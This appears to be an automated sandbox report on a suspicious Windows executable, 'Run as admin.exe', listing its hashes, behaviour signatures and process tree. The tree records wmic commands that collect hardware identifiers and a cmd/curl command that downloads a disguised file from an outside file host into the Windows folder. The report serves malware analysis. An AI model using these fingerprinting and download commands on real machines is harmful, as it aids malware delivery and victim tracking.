Analysis

  • max time kernel
    427s
  • max time network
    1149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28/09/2024, 22:50

General

  • Target

    Run as admin.exe

  • Size

    296KB

  • MD5

    b1c0c309a7574b24abfc2ec22fe879e8

  • SHA1

    b2bde1e54c9d15717a4ac692e82461c979a1e895

  • SHA256

    364fef83527cf425daeda9afbd77ea5466a90ab6de41d55dcb2d750c8cb34247

  • SHA512

    c008b82a4e8e31db5dac9b37b0bac38b96fc275eed2ca8748ee3c6cd57a0a916d772a04f9e49d7376c030498a3ceaf3f03418a00c53762b2b95ee38251a7451d

  • SSDEEP

    3072:nCH7/661TBPYw5weLegNrpJNxUmudrE3XRsR6FF5oXUELgeDXY6NHWw7iiowBAjU:p6TnSevJXulEHYmFmFXB7iignNbpX

Score
4/10

Malware Config

Signatures

  • Drops file in Windows directory 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Run as admin.exe
    "C:\Users\Admin\AppData\Local\Temp\Run as admin.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:3096
    • C:\Windows\System32\Wbem\wmic.exe
      wmic baseboard get serialnumber
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3840
    • C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get processorid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5740
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get uuid
      2⤵
        PID:5272
      • C:\Windows\System32\Wbem\wmic.exe
        wmic path win32_computersystemproduct get uuid
        2⤵
          PID:2136
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path Win32_NetworkAdapter where "PNPDeviceID like '%%PCI%%' AND NetConnectionStatus = 2 AND AdapterTypeID = '0'" get MacAddress
          2⤵
            PID:720
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf >nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5472
            • C:\Windows\system32\curl.exe
              curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf
              3⤵
              • Drops file in Windows directory
              PID:4412

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • \??\c:\Windows\fortnite.ttf

          Filesize

          232KB

          MD5

          c8c8dd1acb9d39ef7fee4c9adb696b5d

          SHA1

          d011763990b860412fe38afd314654fdb79d5c21

          SHA256

          6e2c63af95e794943ff8f2a57dcfc62195693c244a6ec977361475a0368a6786

          SHA512

          db5dc4e536ef08ee05231860bd4ed40a9373282c00e42397e80b9e42fd98012337852bd5b0b1058ff2913c9de516722ae86d56b30a523bd25d5f22f4d005cc7c